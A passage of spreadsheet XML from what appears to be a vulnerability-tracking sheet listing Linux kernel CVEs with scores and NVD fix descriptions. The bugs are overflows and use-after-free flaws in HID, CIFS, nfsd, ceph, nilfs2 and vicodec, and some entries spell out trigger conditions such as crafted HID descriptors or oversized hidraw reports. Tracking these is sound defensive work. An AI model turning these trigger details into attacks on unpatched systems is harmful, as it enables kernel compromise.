        <is>
          <t>CVE-2026-89619</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: intel-thc-hid: intel-quickspi: bound GET_REPORT response to the caller buffer
quickspi_hid_raw_request() receives the caller's buffer length in len, but
quickspi_get_report() never sees it and copies the whole device-supplied
response into buf regardless:
    memcpy(buf, qsdev-&gt;report_buf, qsdev-&gt;report_len);
qsdev-&gt;report_len comes from the input report the touch controller returns,
while buf is sized to whatever the caller asked hidraw for through
HIDIOCGFEATURE or HIDIOCGINPUT.  A response larger than that overflows buf
with device-controlled content.
The intel-quicki2c sibling already passes the caller length down to
quicki2c_get_report() and validates the response against it before the
copy.  Do the same here.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89619</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89620</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr"/>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: intel-thc-hid: intel-quickspi: validate report size before copy
write_cmd_to_txdma() builds an output report in qsdev-&gt;report_buf, a heap
buffer allocated in quickspi_alloc_report_buf() to the device-descriptor
derived max_report_len (a few hundred bytes for a touch controller).  It
copies the caller-supplied report into that buffer:
    memcpy(write_buf-&gt;content, report_buf, report_buf_len);
The HID core caps a report at HID_MAX_BUFFER_SIZE (16384) by default, and
quickspi_hid_ll_driver does not set max_buffer_size, so the length reaches
the driver unbounded.  A hidraw SET_REPORT/SET_FEATURE ioctl carrying a
report larger than max_report_len therefore overflows report_buf with
attacker-controlled length and content.
Record the report_buf allocation size and reject reports that do not fit
before copying, matching the equivalent guard in the intel-quicki2c
sibling (quicki2c_init_write_buf()) and the hid-goodix-spi fix.
write_cmd_to_txdma() writes the output report header ahead of the content
in the same buffer, so size the allocation to cover the header as well.
That keeps the added bound from rejecting a maximum-sized report.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89620</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89622</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr"/>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: mcp2221: clear rxbuf after I2C/SMBus transfer completes
mcp_i2c_smbus_read() stores the caller-supplied buffer pointer in
mcp-&gt;rxbuf for the duration of a transfer but never clears it when the
transfer finishes or times out. Once the caller frees or reuses the
buffer, mcp-&gt;rxbuf becomes a dangling pointer. A delayed or spurious
MCP2221_I2C_GET_DATA report can then drive mcp2221_raw_event() to
memcpy device data into the freed memory, causing a write
use-after-free.
Route all return paths through a single exit point that clears
mcp-&gt;rxbuf and mcp-&gt;rxbuf_size, so that the existing !mcp-&gt;rxbuf guard
in the raw_event handler can reject any report arriving after the
transfer has ended.</t>
        </is>
      </c>
      <c r="S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89622</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89624</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr"/>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: universal-pidff: stop the device when force-feedback init fails
universal_pidff_probe() starts the device with hid_hw_start() and then, if
force-feedback initialisation fails, returns the error through a label that
only does "return error".  The device is left started.
The HID core does not unwind on the driver's behalf.  __hid_device_probe()
releases the devres group, closes the report and clears hdev-&gt;driver:
	if (ret) {
		devres_release_group(&amp;hdev-&gt;dev, hdev-&gt;devres_group_id);
		hid_close_report(hdev);
		hdev-&gt;driver = NULL;
	}
The hidraw character device that hid_hw_start() registered through
hid_connect() is allocated with kzalloc() and added with cdev_device_add(),
so it is not devres-managed and survives that.  With hdev-&gt;driver NULL,
hid_device_remove() skips hid_hw_stop() as well, because it only unwinds
while a driver is still attached.  The registration therefore outlives the
device on both paths.
Opening the surviving /dev/hidrawX writes into freed memory.  KASAN reports
a use-after-free write from hidraw_open() -&gt; hid_hw_open() -&gt; the
transport's open callback, which takes a spinlock inside the freed object.
A descriptor that carries a PID usage page and no input reports is enough:
hidraw claims the device so hid_hw_start() succeeds, while hid-&gt;inputs
stays empty so force-feedback init fails.  The other failure returns in
hid_pidff_init_with_quirks() - no output reports, an allocation failure,
pidff_init_fields(), pidff_check_autocenter(), an unusable effect count,
input_ff_create() - all reach the same label.
Stop the device on that path.  hid-dr.c and hid-emsff.c, which start the
device with the same HID_CONNECT_DEFAULT &amp; ~HID_CONNECT_FF mask, already do
this.  The two earlier gotos must keep returning without hid_hw_stop(),
since neither has a started device, so give the path that fails after the
start its own label.
Discovered by XBOW, triaged by Baul Lee &lt;baul.lee@xbow.com&gt;</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89624</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89638</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: clear setuid/setgid bit on write with cifsacl/modefromsid/posix extensions
When a file has the setuid or setgid bit set and is written to, the VFS
strips those bits and issues a setattr with ATTR_KILL_SUID/ATTR_KILL_SGID
together with an ATTR_MODE carrying the already-cleared mode.
Both cifs_setattr_unix() and cifs_setattr_nounix() unconditionally dropped
ATTR_MODE in that case:
	/* skip mode change if it's just for clearing setuid/setgid */
	if (attrs-&gt;ia_valid &amp; (ATTR_KILL_SUID|ATTR_KILL_SGID))
		attrs-&gt;ia_valid &amp;= ~ATTR_MODE;
This is fine for the default mount, where the mode is only emulated via
the DOS read-only attribute and cannot represent the setuid/setgid bits
anyway.  However, with the "cifsacl" or "modefromsid" mount options the
mode is stored on the server through an ACL (id_mode_to_cifs_acl()), with
the SMB3.1.1 POSIX extensions the mode is sent to the server directly,
and with the SMB1 Unix extensions (cifs_setattr_unix) the mode is sent
via CIFSSMBUnixSetPathInfo().  In all those cases dropping ATTR_MODE means
the cleared mode is never pushed to the server, so the setuid/setgid bit
survives the write.
This is a security issue: on local filesystems the setuid bit is stripped
when a file is written, but over these cifs.ko mounts the bit persists on
the server, potentially allowing an unexpected privilege escalation on
subsequent execution.
Fix this in two places:
  1. cifs_setattr_nounix(): only take the "skip mode change" shortcut
     when the mode is emulated via the DOS read-only attribute (i.e.
     neither cifsacl/modefromsid nor the SMB3.1.1 POSIX extensions are
     in effect), so that the cleared mode is propagated to the server
     in the ACL / POSIX cases.
  2. cifs_setattr_unix(): this function is only called when Unix
     extensions are in effect, so the mode is always stored on the
     server.  Remove the shortcut entirely so that the cleared mode is
     always pushed.</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89638</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89641</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr"/>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cifs: clear tcon after cifsFileInfo_put() in cifs_file_set_size()
When the else branch of cifs_file_set_size() finds a writable file handle
via find_writable_file(), it borrows tcon and server from the handle's
tlink, attempts the handle-based set_file_size() RPC, and then releases
the handle with cifsFileInfo_put().
If set_file_size() fails, execution falls through to the path-based
fallback, which reuses the borrowed tcon and server under the
"if (tcon == NULL)" guard.  Since tcon is not NULL at that point, the
guard is skipped.  If cifsFileInfo_put() dropped the last reference on a
tlink that was already removed from the tlink tree (TCON_LINK_IN_TREE
cleared, as happens during reconnection or session teardown),
cifs_put_tlink() will have freed tcon; the subsequent set_path_size()
call is then a use-after-free.
Setting tcon = NULL after cifsFileInfo_put() causes the existing guard
to take the cifs_sb_tlink() path, which acquires a fresh reference for
the path-based operation or fails cleanly if the session is gone.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89641</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89646</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr"/>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr"/>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ceph: fix leaked inode reference on writeback abort at umount
ceph_dirty_folio() takes a wrbuffer claim on each newly dirtied folio: it
bumps i_wrbuffer_ref (taking an ihold() on the 0-&gt;1 transition) and
attaches the snap_context to folio-&gt;private.  That claim is released only
by ceph_put_wrbuffer_cap_refs(), which for a submitted write runs from
writepages_finish().
In ceph_submit_write(), if ceph_inc_osd_stopping_blocker() fails -- which
happens during umount -- the request is aborted before submission: the
already-collected folios are only redirtied and unlocked, so
writepages_finish() never runs and the claim is leaked.
redirty_page_for_writepage() -&gt; folio_redirty_for_writepage() -&gt;
filemap_dirty_folio() sets PG_dirty directly and does not go through
-&gt;dirty_folio, so ceph_dirty_folio() is not re-entered to rebalance it.
Because every subsequent writeback also fails the osd_stopping_blocker,
i_wrbuffer_ref never returns to 0, the ihold() is never dropped, and the
inode cannot be evicted:
  VFS: Busy inodes after unmount of ceph
  kernel BUG at fs/super.c:650!
Release the orphaned claim in the abort path before redirtying, via
ceph_undo_wrbuffer_claim(): detach the snap_context, drop the wrbuffer
reference (letting i_wrbuffer_ref reach 0 and iput() the inode), and drop
the snap_context reference -- i.e. do what writepages_finish() would have
done for these never-submitted folios.
Only the locked_pages entries are undone; folios still in the fbatch were
never dirty-cleared by this call (folio_clear_dirty_for_io() is the
ownership-transfer point, and a successful move NULLs the fbatch slot), so
they hold no claim this call owns.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89646</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89668</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr"/>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr"/>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: move nfsd_debugfs_init() after nfsd4_init_slabs() in init_nfsd()
nfsd_debugfs_init() runs before nfsd4_init_slabs() in init_nfsd().
If the slab allocation fails, the bare "return retval" bypasses
nfsd_debugfs_exit(), leaving orphan debugfs files with stale fops
pointers into the freed module text.
Move nfsd_debugfs_init() to after the slab init succeeds, so the
early return has no debugfs state to clean up.
Since debugfs is now the more recently initialized of the two, also
update the unwind paths to match reverse-initialization (LIFO) order:
run nfsd_debugfs_exit() before nfsd4_free_slabs() in both the
init_nfsd() error path and exit_nfsd(). The nfsd debugfs files only
reference module-global state and have no dependency on the slab
caches, so that reordering is a cleanup with no functional change.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89668</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89670</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr"/>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr"/>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: hold rcu across localio cmpxchg retry
nfsd_file objects are freed via call_rcu (filecache.c:296), and
nfsd_file_slab is created without SLAB_TYPESAFE_BY_RCU
(KMEM_CACHE(nfsd_file, 0) at filecache.c:789), so the slab page
backing a freed nfsd_file becomes freely reclaimable once the RCU
grace period elapses.
The again: retry block in nfsd_open_local_fh() loads a pointer with
cmpxchg and then calls nfsd_file_get(new) (which is
refcount_inc_not_zero) without holding rcu_read_lock. The sole caller
nfs_open_local_fh() drops rcu_read_lock before invoking this helper,
so no outer reader-side critical section covers the load.
    CPU 0 (nfsd_open_local_fh)        CPU 1 (nfsd_file_put_local)
    -----                             -----
    new = cmpxchg(pnf, NULL, ...)
                                      nf = xchg(pnf, NULL)
                                      nfsd_file_put(nf)
                                        last ref -&gt; call_rcu()
                                      /* grace period elapses;
                                         slab page recycled */
    nfsd_file_get(new)
      refcount_inc_not_zero(&amp;new-&gt;nf_ref)
      /* operates on recycled memory */
A non-zero word at the nf_ref offset of the recycled object makes the
refcount bump appear to succeed, and the caller then dereferences
new-&gt;nf_net and new-&gt;nf_file out of freed memory.
Fix by taking rcu_read_lock() immediately before the cmpxchg and
releasing it on all three exits of the if (new) block: the goto-again
retry, the lost-race cleanup path, and the install-succeeded path.
nfsd_file_put() and nfsd_net_put() stay outside the RCU section so
they remain free to block.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89670</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89690</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr"/>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr"/>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: defer vfree of compound ops to fix rpc_status UAF
The rpc_status netlink dumpit walks every in-flight svc_rqst under
rcu_read_lock and, for NFSv4 requests, reads opnums out of
args-&gt;ops[]. But args-&gt;ops is a separate vmalloc buffer freed
synchronously by vfree() in nfsd4_release_compoundargs() at the end
of every compound. The dumpit's rcu_read_lock pins the svc_rqst
struct itself (freed via kfree_rcu), but nothing defers the vfree
of the ops buffer across the RCU grace period. A concurrent compound
completion can therefore free the buffer while the dumpit is reading
it — a use-after-free on vmalloc memory.
The trailing seqcount recheck (smp_load_acquire of rq_status_counter)
cannot undo a load that already retired against freed memory.
Fix by replacing vfree(args-&gt;ops) with kvfree_rcu_mightsleep(), which
defers the free until after an RCU grace period. This makes the
existing rcu_read_lock in the dumpit sufficient to protect the read.
The tradeoff is that completed compound ops buffers (up to
200 * sizeof(struct nfsd4_op)) persist in memory slightly longer,
across one grace period, before being reclaimed.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89690</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89723</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr"/>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr"/>
      <c r="R407" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nilfs2: fix slab-out-of-bounds in nilfs_direct_propagate after truncation
Shuangpeng Bai reported that KASAN detected a slab-out-of-bounds error
in nilfs_direct_propagate() during testing.
Analysis revealed that after truncating a file, a node block immediately
below the B-tree root was not deleted.  Instead, it remained in the B-tree
node cache in a dirty state.  The log writer subsequently detected this
block and incorrectly invoked nilfs_direct_propagate() on it, which is
designed to handle only data blocks in direct mapping.
B-tree nodes in the cache are managed by virtual block numbers, and their
logical keys typically exceed the range expected by direct mapping.
Consequently, processing such a node as a direct mapping entry triggers
a slab-out-of-bounds access.
The root cause is that when a B-tree mapping collapses into a direct
mapping during truncation, an intermediate node block pointed to by the
root node is left behind as garbage instead of being explicitly deleted.
This resolves the issue by adding a nilfs_btree_discard() operation
to delete the remaining intermediate node block during the conversion.
A 'deform' flag is added to the bop_delete interface to explicitly signal
that the deletion is part of a mapping transformation.  This allows the
B-tree mapping implementation to perform the necessary cleanup and
discarding of the residual node structure that would be otherwise be left
orphaned after the transition.</t>
        </is>
      </c>
      <c r="S407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89723</t>
        </is>
      </c>
    </row>
    <row r="408">
      <c r="A408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89724</t>
        </is>
      </c>
      <c r="D408" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F408" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G408" s="5" t="inlineStr"/>
      <c r="H408" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I408" s="5" t="inlineStr"/>
      <c r="J408" s="5" t="inlineStr"/>
      <c r="K408" s="5" t="inlineStr"/>
      <c r="L408" s="5" t="inlineStr"/>
      <c r="M408" s="5" t="inlineStr"/>
      <c r="N408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O408" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P408" s="5" t="inlineStr"/>
      <c r="Q408" s="5" t="inlineStr"/>
      <c r="R408" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: vicodec: fix out-of-bounds write in FWHT encoder
vidioc_s_fmt_vid_out() sizes the encoder CAPTURE buffer from the
compressed descriptor pixfmt_fwht, whose sizeimage_mult is 3:
coded_w * coded_h * 3 + sizeof(struct fwht_cframe_hdr). fwht_encode_frame()
encodes one plane per component, and an incompressible plane takes the
FWHT_FRAME_UNENCODED path in encode_plane(), copying the plane verbatim.
For a 4-component pixel format all four planes are full resolution
(width_div == height_div == 1), so a frame that forces every plane
through the unencoded fallback writes
sizeof(struct fwht_cframe_hdr) + 4 * coded_w * coded_h bytes, overrunning
the plane by coded_w * coded_h, which can result in corruption
